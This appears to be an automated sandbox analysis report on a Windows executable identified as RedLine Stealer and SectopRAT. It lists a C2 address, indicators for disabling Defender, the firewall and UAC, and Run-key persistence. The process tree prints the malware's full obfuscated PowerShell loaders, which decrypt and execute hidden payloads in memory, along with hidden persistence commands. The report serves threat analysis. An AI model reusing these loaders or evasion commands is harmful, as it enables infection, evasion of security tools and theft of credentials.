Analysis
-
max time kernel
116s -
max time network
117s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
18/03/2025, 16:26
Static task
static1
Behavioral task
behavioral1
Sample
B4B2DF0C17B9CC137372CFB2165D613B.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
B4B2DF0C17B9CC137372CFB2165D613B.exe
Resource
win10v2004-20250314-en
General
-
Target
B4B2DF0C17B9CC137372CFB2165D613B.exe
-
Size
760KB
-
MD5
b4b2df0c17b9cc137372cfb2165d613b
-
SHA1
11f44e224ac71e5de4f70ed47ec0653cab0ce0f1
-
SHA256
d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c
-
SHA512
6a31601940c0a941ad7bc1b56231e9025477d9137e0d683e9085c890ef59d4085262ee4de2664695c3a2209ff4420c64734e38ce24af9722b5f538d2b2bb7798
-
SSDEEP
12288:AUIDlUvK90yHVBZCs/X8RKbbir1QVt3Wgcf64sE8LZfAFoVbp+iaGMgEnhr6JvLg:GjWmppBeb5wjw
Malware Config
Extracted
redline
cheat
193.233.113.113:35361
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/memory/6116-1-0x0000022021300000-0x00000220213C4000-memory.dmp disable_win_def behavioral2/files/0x000800000002422f-349.dat disable_win_def -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" powershell.exe -
Modifies firewall policy service 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/3904-173-0x00000000070E0000-0x00000000070FE000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 1 IoCs
resource yara_rule behavioral2/memory/3904-173-0x00000000070E0000-0x00000000070FE000-memory.dmp family_sectoprat -
Sectoprat family
-
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
pid Process 5688 bcdedit.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 1 3904 powershell.exe 13 3904 powershell.exe -
pid Process 5440 powershell.exe 1308 powershell.exe 6108 powershell.exe 856 powershell.exe 4160 powershell.exe 5100 powershell.exe 1184 powershell.exe 3632 powershell.exe 776 powershell.exe 1944 powershell.exe 4892 powershell.exe 3140 powershell.exe 2736 powershell.exe 4608 powershell.exe 2480 powershell.exe 4088 powershell.exe 5700 powershell.exe 4376 powershell.exe 5416 powershell.exe 980 powershell.exe 4316 powershell.exe 5196 powershell.exe 2876 powershell.exe 1100 powershell.exe 3768 powershell.exe 5752 powershell.exe 3528 powershell.exe 1224 powershell.exe 4976 powershell.exe 1992 powershell.exe 5908 powershell.exe 3620 powershell.exe 1080 powershell.exe 1360 powershell.exe 3904 powershell.exe 3240 powershell.exe 4664 powershell.exe 5996 powershell.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4488 netsh.exe -
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation B4B2DF0C17B9CC137372CFB2165D613B.exe -
Executes dropped EXE 2 IoCs
pid Process 1200 0h4sagxy.p0j.exe 4696 0h4sagxy.p0j.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 30 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\AWindowsService = "AWindowsService.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsInstaller = "WindowsInstaller " powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\root-cryptor = "root-cryptor.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System3264Wow = "System3264Wow" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\System = "System.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\СОСИ ХУЙ ШЛЮХА! = "СОСИ ХУЙ ШЛЮХА!" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\keygroup777.ru = "native.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\System3264Wow = "System3264Wow" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\WINDOWS = "WINDOWS" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ХУЙ ШЛЮХА! = "ХУЙ ШЛЮХА!" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\_default64 = "_default64.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WINDOWS = "WINDOWS" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\root-cryptor = "root-cryptor.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\taskhost = "taskhost.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\windowsx-c = "windowsx-c.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\keygroup777.ru = "native.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ХУЙ ШЛЮХА! = "ХУЙ ШЛЮХА!" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\crypt0rroot = "crypt0rroot.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\WindowsInstaller = "WindowsInstaller " powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\crypt0rroot = "crypt0rroot.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AWindowsService = "AWindowsService.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OneDrive10293 = "OneDrive10293" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "taskhost.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windowsx-c = "windowsx-c.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_default64 = "_default64.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\MSEdgeUpdateX = "MSEdgeUpdateX" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\СОСИ ХУЙ ШЛЮХА! = "СОСИ ХУЙ ШЛЮХА!" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSEdgeUpdateX = "MSEdgeUpdateX" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive10293 = "OneDrive10293" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "System.exe" powershell.exe -
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 4788 cmd.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2376 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OneDriveSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OneDriveSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OneDriveSetup.exe -
Kills process with taskkill 9 IoCs
pid Process 4388 taskkill.exe 4088 taskkill.exe 5504 taskkill.exe 1448 taskkill.exe 5256 taskkill.exe 4636 taskkill.exe 5392 taskkill.exe 1536 taskkill.exe 3576 taskkill.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 4864 reg.exe 2592 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1972 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1224 powershell.exe 1224 powershell.exe 1360 powershell.exe 1360 powershell.exe 3240 powershell.exe 3240 powershell.exe 3904 powershell.exe 4664 powershell.exe 3904 powershell.exe 4664 powershell.exe 5996 powershell.exe 5996 powershell.exe 3768 powershell.exe 3768 powershell.exe 4976 powershell.exe 4976 powershell.exe 5752 powershell.exe 5752 powershell.exe 3528 powershell.exe 3528 powershell.exe 1992 powershell.exe 1992 powershell.exe 5908 powershell.exe 5908 powershell.exe 3620 powershell.exe 3620 powershell.exe 1080 powershell.exe 1080 powershell.exe 3904 powershell.exe 3904 powershell.exe 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 5196 powershell.exe 5196 powershell.exe 2876 powershell.exe 2876 powershell.exe 5100 powershell.exe 5416 powershell.exe 5100 powershell.exe 5416 powershell.exe 1184 powershell.exe 4608 powershell.exe 1100 powershell.exe 1184 powershell.exe 4608 powershell.exe 1100 powershell.exe 3632 powershell.exe 3632 powershell.exe 2480 powershell.exe 2480 powershell.exe 4088 powershell.exe 4088 powershell.exe 5440 powershell.exe 5440 powershell.exe 776 powershell.exe 776 powershell.exe 1308 powershell.exe 1308 powershell.exe 6108 powershell.exe 6108 powershell.exe 1944 powershell.exe 1944 powershell.exe 980 powershell.exe 980 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1224 powershell.exe Token: SeDebugPrivilege 1360 powershell.exe Token: SeDebugPrivilege 3240 powershell.exe Token: SeDebugPrivilege 3904 powershell.exe Token: SeDebugPrivilege 4664 powershell.exe Token: SeDebugPrivilege 5996 powershell.exe Token: SeDebugPrivilege 3768 powershell.exe Token: SeDebugPrivilege 4976 powershell.exe Token: SeDebugPrivilege 5752 powershell.exe Token: SeDebugPrivilege 3528 powershell.exe Token: SeDebugPrivilege 1992 powershell.exe Token: SeDebugPrivilege 5908 powershell.exe Token: SeDebugPrivilege 3620 powershell.exe Token: SeDebugPrivilege 1080 powershell.exe Token: SeDebugPrivilege 5392 taskkill.exe Token: SeDebugPrivilege 4088 taskkill.exe Token: SeDebugPrivilege 5504 taskkill.exe Token: SeDebugPrivilege 1536 taskkill.exe Token: SeDebugPrivilege 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe Token: SeDebugPrivilege 3576 taskkill.exe Token: SeDebugPrivilege 1448 taskkill.exe Token: SeDebugPrivilege 5256 taskkill.exe Token: SeDebugPrivilege 4388 taskkill.exe Token: SeDebugPrivilege 5196 powershell.exe Token: SeDebugPrivilege 2876 powershell.exe Token: SeDebugPrivilege 5100 powershell.exe Token: SeDebugPrivilege 5416 powershell.exe Token: SeDebugPrivilege 1184 powershell.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 3632 powershell.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 4088 powershell.exe Token: SeDebugPrivilege 5440 powershell.exe Token: SeDebugPrivilege 776 powershell.exe Token: SeDebugPrivilege 1308 powershell.exe Token: SeIncreaseQuotaPrivilege 776 powershell.exe Token: SeSecurityPrivilege 776 powershell.exe Token: SeTakeOwnershipPrivilege 776 powershell.exe Token: SeLoadDriverPrivilege 776 powershell.exe Token: SeSystemProfilePrivilege 776 powershell.exe Token: SeSystemtimePrivilege 776 powershell.exe Token: SeProfSingleProcessPrivilege 776 powershell.exe Token: SeIncBasePriorityPrivilege 776 powershell.exe Token: SeCreatePagefilePrivilege 776 powershell.exe Token: SeBackupPrivilege 776 powershell.exe Token: SeRestorePrivilege 776 powershell.exe Token: SeShutdownPrivilege 776 powershell.exe Token: SeDebugPrivilege 776 powershell.exe Token: SeSystemEnvironmentPrivilege 776 powershell.exe Token: SeRemoteShutdownPrivilege 776 powershell.exe Token: SeUndockPrivilege 776 powershell.exe Token: SeManageVolumePrivilege 776 powershell.exe Token: 33 776 powershell.exe Token: 34 776 powershell.exe Token: 35 776 powershell.exe Token: 36 776 powershell.exe Token: SeDebugPrivilege 6108 powershell.exe Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 4636 taskkill.exe Token: SeDebugPrivilege 980 powershell.exe Token: SeDebugPrivilege 4892 powershell.exe Token: SeDebugPrivilege 856 powershell.exe Token: SeDebugPrivilege 3140 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 6116 wrote to memory of 1948 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 87 PID 6116 wrote to memory of 1948 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 87 PID 6116 wrote to memory of 5232 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 89 PID 6116 wrote to memory of 5232 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 89 PID 6116 wrote to memory of 1224 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 90 PID 6116 wrote to memory of 1224 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 90 PID 5232 wrote to memory of 2552 5232 cmd.exe 93 PID 5232 wrote to memory of 2552 5232 cmd.exe 93 PID 5232 wrote to memory of 1360 5232 cmd.exe 94 PID 5232 wrote to memory of 1360 5232 cmd.exe 94 PID 1948 wrote to memory of 3220 1948 cmd.exe 95 PID 1948 wrote to memory of 3220 1948 cmd.exe 95 PID 1948 wrote to memory of 3904 1948 cmd.exe 96 PID 1948 wrote to memory of 3904 1948 cmd.exe 96 PID 1948 wrote to memory of 3904 1948 cmd.exe 96 PID 6116 wrote to memory of 3240 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 97 PID 6116 wrote to memory of 3240 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 97 PID 6116 wrote to memory of 4664 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 99 PID 6116 wrote to memory of 4664 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 99 PID 6116 wrote to memory of 5996 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 101 PID 6116 wrote to memory of 5996 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 101 PID 6116 wrote to memory of 3768 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 103 PID 6116 wrote to memory of 3768 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 103 PID 6116 wrote to memory of 4976 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 105 PID 6116 wrote to memory of 4976 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 105 PID 6116 wrote to memory of 5752 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 108 PID 6116 wrote to memory of 5752 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 108 PID 6116 wrote to memory of 3528 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 110 PID 6116 wrote to memory of 3528 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 110 PID 6116 wrote to memory of 1992 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 112 PID 6116 wrote to memory of 1992 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 112 PID 6116 wrote to memory of 5908 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 114 PID 6116 wrote to memory of 5908 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 114 PID 6116 wrote to memory of 3620 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 116 PID 6116 wrote to memory of 3620 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 116 PID 6116 wrote to memory of 1080 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 118 PID 6116 wrote to memory of 1080 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 118 PID 6116 wrote to memory of 1972 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 120 PID 6116 wrote to memory of 1972 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 120 PID 6116 wrote to memory of 5280 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 126 PID 6116 wrote to memory of 5280 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 126 PID 6116 wrote to memory of 5260 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 127 PID 6116 wrote to memory of 5260 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 127 PID 5260 wrote to memory of 5392 5260 cmd.exe 130 PID 5260 wrote to memory of 5392 5260 cmd.exe 130 PID 5280 wrote to memory of 4088 5280 cmd.exe 131 PID 5280 wrote to memory of 4088 5280 cmd.exe 131 PID 6116 wrote to memory of 4640 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 132 PID 6116 wrote to memory of 4640 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 132 PID 6116 wrote to memory of 1848 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 134 PID 6116 wrote to memory of 1848 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 134 PID 4640 wrote to memory of 5504 4640 cmd.exe 136 PID 4640 wrote to memory of 5504 4640 cmd.exe 136 PID 1848 wrote to memory of 1536 1848 cmd.exe 137 PID 1848 wrote to memory of 1536 1848 cmd.exe 137 PID 6116 wrote to memory of 3576 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 138 PID 6116 wrote to memory of 3576 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 138 PID 6116 wrote to memory of 2556 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 140 PID 6116 wrote to memory of 2556 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 140 PID 6116 wrote to memory of 2072 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 142 PID 6116 wrote to memory of 2072 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 142 PID 2556 wrote to memory of 1448 2556 cmd.exe 143 PID 2556 wrote to memory of 1448 2556 cmd.exe 143 PID 6116 wrote to memory of 5256 6116 B4B2DF0C17B9CC137372CFB2165D613B.exe 145 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\B4B2DF0C17B9CC137372CFB2165D613B.exe"C:\Users\Admin\AppData\Local\Temp\B4B2DF0C17B9CC137372CFB2165D613B.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6116 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\cqxwsvrp.vd1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mLV7KrO3wLHHAAm4GaaFGgjj/GUAMMVOaPh3FGpoUZs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BMXXbGgs1mALdsCSxvMtpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZWVZX=New-Object System.IO.MemoryStream(,$param_var); $Tupqk=New-Object System.IO.MemoryStream; $pEVyq=New-Object System.IO.Compression.GZipStream($ZWVZX, [IO.Compression.CompressionMode]::Decompress); $pEVyq.CopyTo($Tupqk); $pEVyq.Dispose(); $ZWVZX.Dispose(); $Tupqk.Dispose(); $Tupqk.ToArray();}function execute_function($param_var,$param2_var){ $YwxMS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ALVCG=$YwxMS.EntryPoint; $ALVCG.Invoke($null, $param2_var);}$bwlKi = 'C:\cqxwsvrp.vd1.bat';$host.UI.RawUI.WindowTitle = $bwlKi;$NiVuC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bwlKi).Split([Environment]::NewLine);foreach ($OBjYH in $NiVuC) { if ($OBjYH.StartsWith('EiQdPpTgEPKAUuFHgbxm')) { $JPYHw=$OBjYH.Substring(20); break; }}$payloads_var=[string[]]$JPYHw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:3220
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\1sys20kx.h5i.bat2⤵
- Suspicious use of WriteProcessMemory
PID:5232 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PEylQItydp6DF2KLKsDsMrVgiK6Anhs4Yd2E90Yt80='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IfesP7NShxOIaefsOsYtLQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EgdKe=New-Object System.IO.MemoryStream(,$param_var); $IqEPB=New-Object System.IO.MemoryStream; $NGAHc=New-Object System.IO.Compression.GZipStream($EgdKe, [IO.Compression.CompressionMode]::Decompress); $NGAHc.CopyTo($IqEPB); $NGAHc.Dispose(); $EgdKe.Dispose(); $IqEPB.Dispose(); $IqEPB.ToArray();}function execute_function($param_var,$param2_var){ $TAWjc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hYpAi=$TAWjc.EntryPoint; $hYpAi.Invoke($null, $param2_var);}$bHXSX = 'C:\Users\Admin\AppData\Local\Temp\1sys20kx.h5i.bat';$host.UI.RawUI.WindowTitle = $bHXSX;$AnHdV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bHXSX).Split([Environment]::NewLine);foreach ($Yltfo in $AnHdV) { if ($Yltfo.StartsWith('CFYIvkGECqujgRZhzKOC')) { $GVQOC=$Yltfo.Substring(20); break; }}$payloads_var=[string[]]$GVQOC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:2552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4664
-
-
